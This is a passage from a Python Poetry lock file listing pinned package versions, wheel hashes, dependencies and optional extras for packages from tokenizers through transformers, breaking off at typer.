{file = "tokenizers-0.13.3-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:4b3e3215d048e94f40f1c95802e45dcc37c5b05eb46280fc2ccc8cd351bff839"},
{file = "tokenizers-0.13.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9ba2b0bf01777c9b9bc94b53764d6684554ce98551fec496f71bc5be3a03e98b"},
{file = "tokenizers-0.13.3-cp311-cp311-win32.whl", hash = "sha256:cc78d77f597d1c458bf0ea7c2a64b6aa06941c7a99cb135b5969b0278824d808"},
{file = "tokenizers-0.13.3-cp311-cp311-win_amd64.whl", hash = "sha256:ecf182bf59bd541a8876deccf0360f5ae60496fd50b58510048020751cf1724c"},
{file = "tokenizers-0.13.3-cp37-cp37m-macosx_10_11_x86_64.whl", hash = "sha256:0527dc5436a1f6bf2c0327da3145687d3bcfbeab91fed8458920093de3901b44"},
{file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:07cbb2c307627dc99b44b22ef05ff4473aa7c7cc1fec8f0a8b37d8a64b1a16d2"},
{file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4560dbdeaae5b7ee0d4e493027e3de6d53c991b5002d7ff95083c99e11dd5ac0"},
{file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:64064bd0322405c9374305ab9b4c07152a1474370327499911937fd4a76d004b"},
{file = "tokenizers-0.13.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b8c6e2ab0f2e3d939ca66aa1d596602105fe33b505cd2854a4c1717f704c51de"},
{file = "tokenizers-0.13.3-cp37-cp37m-win32.whl", hash = "sha256:6cc29d410768f960db8677221e497226e545eaaea01aa3613fa0fdf2cc96cff4"},
{file = "tokenizers-0.13.3-cp37-cp37m-win_amd64.whl", hash = "sha256:fc2a7fdf864554a0dacf09d32e17c0caa9afe72baf9dd7ddedc61973bae352d8"},
{file = "tokenizers-0.13.3-cp38-cp38-macosx_10_11_x86_64.whl", hash = "sha256:8791dedba834c1fc55e5f1521be325ea3dafb381964be20684b92fdac95d79b7"},
{file = "tokenizers-0.13.3-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:d607a6a13718aeb20507bdf2b96162ead5145bbbfa26788d6b833f98b31b26e1"},
{file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3791338f809cd1bf8e4fee6b540b36822434d0c6c6bc47162448deee3f77d425"},
{file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c2f35f30e39e6aab8716f07790f646bdc6e4a853816cc49a95ef2a9016bf9ce6"},
{file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:310204dfed5aa797128b65d63538a9837cbdd15da2a29a77d67eefa489edda26"},
{file = "tokenizers-0.13.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a0f9b92ea052305166559f38498b3b0cae159caea712646648aaa272f7160963"},
{file = "tokenizers-0.13.3-cp38-cp38-win32.whl", hash = "sha256:9a3fa134896c3c1f0da6e762d15141fbff30d094067c8f1157b9fdca593b5806"},
{file = "tokenizers-0.13.3-cp38-cp38-win_amd64.whl", hash = "sha256:8e7b0cdeace87fa9e760e6a605e0ae8fc14b7d72e9fc19c578116f7287bb873d"},
{file = "tokenizers-0.13.3-cp39-cp39-macosx_10_11_x86_64.whl", hash = "sha256:00cee1e0859d55507e693a48fa4aef07060c4bb6bd93d80120e18fea9371c66d"},
{file = "tokenizers-0.13.3-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:a23ff602d0797cea1d0506ce69b27523b07e70f6dda982ab8cf82402de839088"},
{file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:70ce07445050b537d2696022dafb115307abdffd2a5c106f029490f84501ef97"},
{file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:280ffe95f50eaaf655b3a1dc7ff1d9cf4777029dbbc3e63a74e65a056594abc3"},
{file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:97acfcec592f7e9de8cadcdcda50a7134423ac8455c0166b28c9ff04d227b371"},
{file = "tokenizers-0.13.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd7730c98a3010cd4f523465867ff95cd9d6430db46676ce79358f65ae39797b"},
{file = "tokenizers-0.13.3-cp39-cp39-win32.whl", hash = "sha256:48625a108029cb1ddf42e17a81b5a3230ba6888a70c9dc14e81bc319e812652d"},
{file = "tokenizers-0.13.3-cp39-cp39-win_amd64.whl", hash = "sha256:bc0a6f1ba036e482db6453571c9e3e60ecd5489980ffd95d11dc9f960483d783"},
{file = "tokenizers-0.13.3.tar.gz", hash = "sha256:2e546dbb68b623008a5442353137fbb0123d311a6d7ba52f2667c8862a75af2e"},
]
[package.extras]
dev = ["black (==22.3)", "datasets", "numpy", "pytest", "requests"]
docs = ["setuptools-rust", "sphinx", "sphinx-rtd-theme"]
testing = ["black (==22.3)", "datasets", "numpy", "pytest", "requests"]
[[package]]
name = "toml"
version = "0.10.2"
description = "Python Library for Tom's Obvious, Minimal Language"
optional = false
python-versions = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*"
files = [
{file = "toml-0.10.2-py2.py3-none-any.whl", hash = "sha256:806143ae5bfb6a3c6e736a764057db0e6a0e05e338b5630894a5f779cabb4f9b"},
{file = "toml-0.10.2.tar.gz", hash = "sha256:b3bda1d108d5dd99f4a20d24d9c348e91c4db7ab1b749200bded2f839ccbe68f"},
]
[[package]]
name = "tomli"
version = "2.0.1"
description = "A lil' TOML parser"
optional = false
python-versions = ">=3.7"
files = [
{file = "tomli-2.0.1-py3-none-any.whl", hash = "sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc"},
{file = "tomli-2.0.1.tar.gz", hash = "sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f"},
]
[[package]]
name = "toolz"
version = "0.12.0"
description = "List processing tools and functional utilities"
optional = true
python-versions = ">=3.5"
files = [
{file = "toolz-0.12.0-py3-none-any.whl", hash = "sha256:2059bd4148deb1884bb0eb770a3cde70e7f954cfbbdc2285f1f2de01fd21eb6f"},
{file = "toolz-0.12.0.tar.gz", hash = "sha256:88c570861c440ee3f2f6037c4654613228ff40c93a6c25e0eba70d17282c6194"},
]
[[package]]
name = "torch"
version = "1.13.1"
description = "Tensors and Dynamic neural networks in Python with strong GPU acceleration"
optional = true
python-versions = ">=3.7.0"
files = [
{file = "torch-1.13.1-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:fd12043868a34a8da7d490bf6db66991108b00ffbeecb034228bfcbbd4197143"},
{file = "torch-1.13.1-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:d9fe785d375f2e26a5d5eba5de91f89e6a3be5d11efb497e76705fdf93fa3c2e"},
{file = "torch-1.13.1-cp310-cp310-win_amd64.whl", hash = "sha256:98124598cdff4c287dbf50f53fb455f0c1e3a88022b39648102957f3445e9b76"},
{file = "torch-1.13.1-cp310-none-macosx_10_9_x86_64.whl", hash = "sha256:393a6273c832e047581063fb74335ff50b4c566217019cc6ace318cd79eb0566"},
{file = "torch-1.13.1-cp310-none-macosx_11_0_arm64.whl", hash = "sha256:0122806b111b949d21fa1a5f9764d1fd2fcc4a47cb7f8ff914204fd4fc752ed5"},
{file = "torch-1.13.1-cp311-cp311-manylinux1_x86_64.whl", hash = "sha256:22128502fd8f5b25ac1cd849ecb64a418382ae81dd4ce2b5cebaa09ab15b0d9b"},
{file = "torch-1.13.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:76024be052b659ac1304ab8475ab03ea0a12124c3e7626282c9c86798ac7bc11"},
{file = "torch-1.13.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:ea8dda84d796094eb8709df0fcd6b56dc20b58fdd6bc4e8d7109930dafc8e419"},
{file = "torch-1.13.1-cp37-cp37m-win_amd64.whl", hash = "sha256:2ee7b81e9c457252bddd7d3da66fb1f619a5d12c24d7074de91c4ddafb832c93"},
{file = "torch-1.13.1-cp37-none-macosx_10_9_x86_64.whl", hash = "sha256:0d9b8061048cfb78e675b9d2ea8503bfe30db43d583599ae8626b1263a0c1380"},
{file = "torch-1.13.1-cp37-none-macosx_11_0_arm64.whl", hash = "sha256:f402ca80b66e9fbd661ed4287d7553f7f3899d9ab54bf5c67faada1555abde28"},
{file = "torch-1.13.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:727dbf00e2cf858052364c0e2a496684b9cb5aa01dc8a8bc8bbb7c54502bdcdd"},
{file = "torch-1.13.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:df8434b0695e9ceb8cc70650afc1310d8ba949e6db2a0525ddd9c3b2b181e5fe"},
{file = "torch-1.13.1-cp38-cp38-win_amd64.whl", hash = "sha256:5e1e722a41f52a3f26f0c4fcec227e02c6c42f7c094f32e49d4beef7d1e213ea"},
{file = "torch-1.13.1-cp38-none-macosx_10_9_x86_64.whl", hash = "sha256:33e67eea526e0bbb9151263e65417a9ef2d8fa53cbe628e87310060c9dcfa312"},
{file = "torch-1.13.1-cp38-none-macosx_11_0_arm64.whl", hash = "sha256:eeeb204d30fd40af6a2d80879b46a7efbe3cf43cdbeb8838dd4f3d126cc90b2b"},
{file = "torch-1.13.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:50ff5e76d70074f6653d191fe4f6a42fdbe0cf942fbe2a3af0b75eaa414ac038"},
{file = "torch-1.13.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:2c3581a3fd81eb1f0f22997cddffea569fea53bafa372b2c0471db373b26aafc"},
{file = "torch-1.13.1-cp39-cp39-win_amd64.whl", hash = "sha256:0aa46f0ac95050c604bcf9ef71da9f1172e5037fdf2ebe051962d47b123848e7"},
{file = "torch-1.13.1-cp39-none-macosx_10_9_x86_64.whl", hash = "sha256:6930791efa8757cb6974af73d4996b6b50c592882a324b8fb0589c6a9ba2ddaf"},
{file = "torch-1.13.1-cp39-none-macosx_11_0_arm64.whl", hash = "sha256:e0df902a7c7dd6c795698532ee5970ce898672625635d885eade9976e5a04949"},
]
[package.dependencies]
nvidia-cublas-cu11 = {version = "11.10.3.66", markers = "platform_system == \"Linux\""}
nvidia-cuda-nvrtc-cu11 = {version = "11.7.99", markers = "platform_system == \"Linux\""}
nvidia-cuda-runtime-cu11 = {version = "11.7.99", markers = "platform_system == \"Linux\""}
nvidia-cudnn-cu11 = {version = "8.5.0.96", markers = "platform_system == \"Linux\""}
typing-extensions = "*"
[package.extras]
opt-einsum = ["opt-einsum (>=3.3)"]
[[package]]
name = "torchvision"
version = "0.14.1"
description = "image and video datasets and models for torch deep learning"
optional = true
python-versions = ">=3.7"
files = [
{file = "torchvision-0.14.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:eeb05dd9dd3af5428fee525400759daf8da8e4caec45ddd6908cfb36571f6433"},
{file = "torchvision-0.14.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:8d0766ea92affa7af248e327dd85f7c9cfdf51a57530b43212d4e1858548e9d7"},
{file = "torchvision-0.14.1-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:6d7b35653113664ea3fdcb71f515cfbf29d2fe393000fd8aaff27a1284de6908"},
{file = "torchvision-0.14.1-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:8a9eb773a2fa8f516e404ac09c059fb14e6882c48fdbb9c946327d2ce5dba6cd"},
{file = "torchvision-0.14.1-cp310-cp310-win_amd64.whl", hash = "sha256:13986f0c15377ff23039e1401012ccb6ecf71024ce53def27139e4eac5a57592"},
{file = "torchvision-0.14.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:fb7a793fd33ce1abec24b42778419a3fb1e3159d7dfcb274a3ca8fb8cbc408dc"},
{file = "torchvision-0.14.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:89fb0419780ec9a9eb9f7856a0149f6ac9f956b28f44b0c0080c6b5b48044db7"},
{file = "torchvision-0.14.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:a2d4237d3c9705d7729eb4534e4eb06f1d6be7ff1df391204dfb51586d9b0ecb"},
{file = "torchvision-0.14.1-cp37-cp37m-win_amd64.whl", hash = "sha256:92a324712a87957443cc34223274298ae9496853f115c252f8fc02b931f2340e"},
{file = "torchvision-0.14.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:68ed03359dcd3da9cd21b8ab94da21158df8a6a0c5bad0bf4a42f0e448d28cb3"},
{file = "torchvision-0.14.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:30fcf0e9fe57d4ac4ce6426659a57dce199637ccb6c70be1128670f177692624"},
{file = "torchvision-0.14.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:0ed02aefd09bf1114d35f1aa7dce55aa61c2c7e57f9aa02dce362860be654e85"},
{file = "torchvision-0.14.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:a541e49fc3c4e90e49e6988428ab047415ed52ea97d0c0bfd147d8bacb8f4df8"},
{file = "torchvision-0.14.1-cp38-cp38-win_amd64.whl", hash = "sha256:6099b3191dc2516099a32ae38a5fb349b42e863872a13545ab1a524b6567be60"},
{file = "torchvision-0.14.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:c5e744f56e5f5b452deb5fc0f3f2ba4d2f00612d14d8da0dbefea8f09ac7690b"},
{file = "torchvision-0.14.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:758b20d079e810b4740bd60d1eb16e49da830e3360f9be379eb177ee221fa5d4"},
{file = "torchvision-0.14.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:83045507ef8d3c015d4df6be79491375b2f901352cfca6e72b4723e9c4f9a55d"},
{file = "torchvision-0.14.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:eaed58cf454323ed9222d4e0dd5fb897064f454b400696e03a5200e65d3a1e76"},
{file = "torchvision-0.14.1-cp39-cp39-win_amd64.whl", hash = "sha256:b337e1245ca4353623dd563c03cd8f020c2496a7c5d12bba4d2e381999c766e0"},
]
[package.dependencies]
numpy = "*"
pillow = ">=5.3.0,<8.3.dev0 || >=8.4.dev0"
requests = "*"
torch = "1.13.1"
typing-extensions = "*"
[package.extras]
scipy = ["scipy"]
[[package]]
name = "tornado"
version = "6.3.3"
description = "Tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed."
optional = false
python-versions = ">= 3.8"
files = [
{file = "tornado-6.3.3-cp38-abi3-macosx_10_9_universal2.whl", hash = "sha256:502fba735c84450974fec147340016ad928d29f1e91f49be168c0a4c18181e1d"},
{file = "tornado-6.3.3-cp38-abi3-macosx_10_9_x86_64.whl", hash = "sha256:805d507b1f588320c26f7f097108eb4023bbaa984d63176d1652e184ba24270a"},
{file = "tornado-6.3.3-cp38-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1bd19ca6c16882e4d37368e0152f99c099bad93e0950ce55e71daed74045908f"},
{file = "tornado-6.3.3-cp38-abi3-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7ac51f42808cca9b3613f51ffe2a965c8525cb1b00b7b2d56828b8045354f76a"},
{file = "tornado-6.3.3-cp38-abi3-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:71a8db65160a3c55d61839b7302a9a400074c9c753040455494e2af74e2501f2"},
{file = "tornado-6.3.3-cp38-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:ceb917a50cd35882b57600709dd5421a418c29ddc852da8bcdab1f0db33406b0"},
{file = "tornado-6.3.3-cp38-abi3-musllinux_1_1_i686.whl", hash = "sha256:7d01abc57ea0dbb51ddfed477dfe22719d376119844e33c661d873bf9c0e4a16"},
{file = "tornado-6.3.3-cp38-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:9dc4444c0defcd3929d5c1eb5706cbe1b116e762ff3e0deca8b715d14bf6ec17"},
{file = "tornado-6.3.3-cp38-abi3-win32.whl", hash = "sha256:65ceca9500383fbdf33a98c0087cb975b2ef3bfb874cb35b8de8740cf7f41bd3"},
{file = "tornado-6.3.3-cp38-abi3-win_amd64.whl", hash = "sha256:22d3c2fa10b5793da13c807e6fc38ff49a4f6e1e3868b0a6f4164768bb8e20f5"},
{file = "tornado-6.3.3.tar.gz", hash = "sha256:e7d8db41c0181c80d76c982aacc442c0783a2c54d6400fe028954201a2e032fe"},
]
[[package]]
name = "tqdm"
version = "4.66.1"
description = "Fast, Extensible Progress Meter"
optional = false
python-versions = ">=3.7"
files = [
{file = "tqdm-4.66.1-py3-none-any.whl", hash = "sha256:d302b3c5b53d47bce91fea46679d9c3c6508cf6332229aa1e7d8653723793386"},
{file = "tqdm-4.66.1.tar.gz", hash = "sha256:d88e651f9db8d8551a62556d3cff9e3034274ca5d66e93197cf2490e2dcb69c7"},
]
[package.dependencies]
colorama = {version = "*", markers = "platform_system == \"Windows\""}
[package.extras]
dev = ["pytest (>=6)", "pytest-cov", "pytest-timeout", "pytest-xdist"]
notebook = ["ipywidgets (>=6)"]
slack = ["slack-sdk"]
telegram = ["requests"]
[[package]]
name = "traitlets"
version = "5.12.0"
description = "Traitlets Python configuration system"
optional = false
python-versions = ">=3.8"
files = [
{file = "traitlets-5.12.0-py3-none-any.whl", hash = "sha256:81539f07f7aebcde2e4b5ab76727f53eabf18ad155c6ed7979a681411602fa47"},
{file = "traitlets-5.12.0.tar.gz", hash = "sha256:833273bf645d8ce31dcb613c56999e2e055b1ffe6d09168a164bcd91c36d5d35"},
]
[package.extras]
docs = ["myst-parser", "pydata-sphinx-theme", "sphinx"]
test = ["argcomplete (>=3.0.3)", "mypy (>=1.6.0)", "pre-commit", "pytest (>=7.0,<7.5)", "pytest-mock", "pytest-mypy-testing"]
[[package]]
name = "transformers"
version = "4.33.3"
description = "State-of-the-art Machine Learning for JAX, PyTorch and TensorFlow"
optional = true
python-versions = ">=3.8.0"
files = [
{file = "transformers-4.33.3-py3-none-any.whl", hash = "sha256:7150bbf6781ddb3338ce7d74f4d6f557e6c236a0a1dd3de57412214caae7fd71"},
{file = "transformers-4.33.3.tar.gz", hash = "sha256:8ea7c92310dee7c63b14766ce928218f7a9177960b2487ac018c91ae621af03e"},
]
[package.dependencies]
filelock = "*"
huggingface-hub = ">=0.15.1,<1.0"
numpy = ">=1.17"
packaging = ">=20.0"
pyyaml = ">=5.1"
regex = "!=2019.12.17"
requests = "*"
safetensors = ">=0.3.1"
tokenizers = ">=0.11.1,<0.11.3 || >0.11.3,<0.14"
tqdm = ">=4.27"
[package.extras]
accelerate = ["accelerate (>=0.20.3)"]
agents = ["Pillow (<10.0.0)", "accelerate (>=0.20.3)", "datasets (!=2.5.0)", "diffusers", "opencv-python", "sentencepiece (>=0.1.91,!=0.1.92)", "torch (>=1.10,!=1.12.0)"]
all = ["Pillow (<10.0.0)", "accelerate (>=0.20.3)", "av (==9.2.0)", "codecarbon (==1.2.0)", "decord (==0.6.0)", "flax (>=0.4.1,<=0.7.0)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "phonemizer", "protobuf", "pyctcdecode (>=0.4.0)", "ray[tune]", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision"]
audio = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"]
codecarbon = ["codecarbon (==1.2.0)"]
deepspeed = ["accelerate (>=0.20.3)", "deepspeed (>=0.9.3)"]
deepspeed-testing = ["GitPython (<3.1.19)", "accelerate (>=0.20.3)", "beautifulsoup4", "black (>=23.1,<24.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "deepspeed (>=0.9.3)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "hf-doc-builder (>=0.3.0)", "nltk", "optuna", "parameterized", "protobuf", "psutil", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "sentencepiece (>=0.1.91,!=0.1.92)", "timeout-decorator"]
dev = ["GitPython (<3.1.19)", "Pillow (<10.0.0)", "accelerate (>=0.20.3)", "av (==9.2.0)", "beautifulsoup4", "black (>=23.1,<24.0)", "codecarbon (==1.2.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "decord (==0.6.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "flax (>=0.4.1,<=0.7.0)", "fugashi (>=1.0)", "hf-doc-builder", "hf-doc-builder (>=0.3.0)", "ipadic (>=1.0.0,<2.0)", "isort (>=5.5.4)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "nltk", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "ray[tune]", "rhoknp (>=1.1.0,<1.3.1)", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (>=0.0.241,<=0.0.259)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timeout-decorator", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)", "urllib3 (<2.0.0)"]
dev-tensorflow = ["GitPython (<3.1.19)", "Pillow (<10.0.0)", "beautifulsoup4", "black (>=23.1,<24.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "hf-doc-builder", "hf-doc-builder (>=0.3.0)", "isort (>=5.5.4)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "nltk", "onnxconverter-common", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (>=0.0.241,<=0.0.259)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timeout-decorator", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "urllib3 (<2.0.0)"]
dev-torch = ["GitPython (<3.1.19)", "Pillow (<10.0.0)", "accelerate (>=0.20.3)", "beautifulsoup4", "black (>=23.1,<24.0)", "codecarbon (==1.2.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "fugashi (>=1.0)", "hf-doc-builder", "hf-doc-builder (>=0.3.0)", "ipadic (>=1.0.0,<2.0)", "isort (>=5.5.4)", "kenlm", "librosa", "nltk", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "optuna", "parameterized", "phonemizer", "protobuf", "psutil", "pyctcdecode (>=0.4.0)", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "ray[tune]", "rhoknp (>=1.1.0,<1.3.1)", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "ruff (>=0.0.241,<=0.0.259)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "scikit-learn", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "timeout-decorator", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)", "urllib3 (<2.0.0)"]
docs = ["Pillow (<10.0.0)", "accelerate (>=0.20.3)", "av (==9.2.0)", "codecarbon (==1.2.0)", "decord (==0.6.0)", "flax (>=0.4.1,<=0.7.0)", "hf-doc-builder", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "kenlm", "keras-nlp (>=0.3.1)", "librosa", "onnxconverter-common", "optax (>=0.0.8,<=0.1.4)", "optuna", "phonemizer", "protobuf", "pyctcdecode (>=0.4.0)", "ray[tune]", "sentencepiece (>=0.1.91,!=0.1.92)", "sigopt", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx", "timm", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "torchaudio", "torchvision"]
docs-specific = ["hf-doc-builder"]
fairscale = ["fairscale (>0.3)"]
flax = ["flax (>=0.4.1,<=0.7.0)", "jax (>=0.4.1,<=0.4.13)", "jaxlib (>=0.4.1,<=0.4.13)", "optax (>=0.0.8,<=0.1.4)"]
flax-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"]
ftfy = ["ftfy"]
integrations = ["optuna", "ray[tune]", "sigopt"]
ja = ["fugashi (>=1.0)", "ipadic (>=1.0.0,<2.0)", "rhoknp (>=1.1.0,<1.3.1)", "sudachidict-core (>=20220729)", "sudachipy (>=0.6.6)", "unidic (>=1.0.2)", "unidic-lite (>=1.0.7)"]
modelcreation = ["cookiecutter (==1.7.3)"]
natten = ["natten (>=0.14.6)"]
onnx = ["onnxconverter-common", "onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)", "tf2onnx"]
onnxruntime = ["onnxruntime (>=1.4.0)", "onnxruntime-tools (>=1.4.2)"]
optuna = ["optuna"]
quality = ["GitPython (<3.1.19)", "black (>=23.1,<24.0)", "datasets (!=2.5.0)", "hf-doc-builder (>=0.3.0)", "isort (>=5.5.4)", "ruff (>=0.0.241,<=0.0.259)", "urllib3 (<2.0.0)"]
ray = ["ray[tune]"]
retrieval = ["datasets (!=2.5.0)", "faiss-cpu"]
sagemaker = ["sagemaker (>=2.31.0)"]
sentencepiece = ["protobuf", "sentencepiece (>=0.1.91,!=0.1.92)"]
serving = ["fastapi", "pydantic (<2)", "starlette", "uvicorn"]
sigopt = ["sigopt"]
sklearn = ["scikit-learn"]
speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)", "torchaudio"]
testing = ["GitPython (<3.1.19)", "beautifulsoup4", "black (>=23.1,<24.0)", "cookiecutter (==1.7.3)", "datasets (!=2.5.0)", "dill (<0.3.5)", "evaluate (>=0.2.0)", "faiss-cpu", "hf-doc-builder (>=0.3.0)", "nltk", "parameterized", "protobuf", "psutil", "pytest (>=7.2.0)", "pytest-timeout", "pytest-xdist", "rjieba", "rouge-score (!=0.0.7,!=0.0.8,!=0.1,!=0.1.1)", "sacrebleu (>=1.4.12,<2.0.0)", "sacremoses", "timeout-decorator"]
tf = ["keras-nlp (>=0.3.1)", "onnxconverter-common", "tensorflow (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx"]
tf-cpu = ["keras-nlp (>=0.3.1)", "onnxconverter-common", "tensorflow-cpu (>=2.6,<2.15)", "tensorflow-text (<2.15)", "tf2onnx"]
tf-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)"]
timm = ["timm"]
tokenizers = ["tokenizers (>=0.11.1,!=0.11.3,<0.14)"]
torch = ["accelerate (>=0.20.3)", "torch (>=1.10,!=1.12.0)"]
torch-speech = ["kenlm", "librosa", "phonemizer", "pyctcdecode (>=0.4.0)", "torchaudio"]
torch-vision = ["Pillow (<10.0.0)", "torchvision"]
torchhub = ["filelock", "huggingface-hub (>=0.15.1,<1.0)", "importlib-metadata", "numpy (>=1.17)", "packaging (>=20.0)", "protobuf", "regex (!=2019.12.17)", "requests", "sentencepiece (>=0.1.91,!=0.1.92)", "tokenizers (>=0.11.1,!=0.11.3,<0.14)", "torch (>=1.10,!=1.12.0)", "tqdm (>=4.27)"]
video = ["av (==9.2.0)", "decord (==0.6.0)"]
vision = ["Pillow (<10.0.0)"]
[[package]]
name = "typer"
version = "0.9.0"
description = "Typer, build great CLIs. Easy to code. Based on Python type hints."
optional = true
python-versions = ">=3.6"
files = [
